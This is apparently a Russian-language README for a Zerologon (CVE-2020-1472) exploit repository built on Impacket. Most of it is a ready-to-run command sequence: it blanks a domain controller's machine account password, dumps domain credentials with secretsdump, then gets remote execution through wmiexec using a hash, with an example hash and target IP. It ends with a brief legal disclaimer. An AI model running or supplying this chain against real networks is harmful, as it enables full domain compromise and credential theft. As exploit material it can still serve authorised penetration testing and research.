
Практическое доказательство концепции для CVE-2020-1472 (Zerologon) с использованием библиотеки Impacket для эксплуатации уязвимости Netlogon и выполнения несанкционированного доступа к контроллеру домена.
Этот репозиторий содержит обновлённую реализацию (2024) эксплойта Zerologon в сочетании с инструментами Impacket для эксплуатации CVE-2020-1472 (Zerologon). Данный эксплойт нацелен на среды Windows Server для изменения пароля учётной записи компьютера и выполнения lateral movement.
pip install -r requirements.txt
python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python secretsdump.py -just-dc "tancongmang/[email protected]"
python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
WIN-C9PAHHGJN91 и 192.168.40.145 на фактическое имя хоста и IP-адрес цели.Используйте этот инструмент ответственно. Несанкционированное использование данного инструмента для эксплуатации систем без явного разрешения является незаконным и неэтичным. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.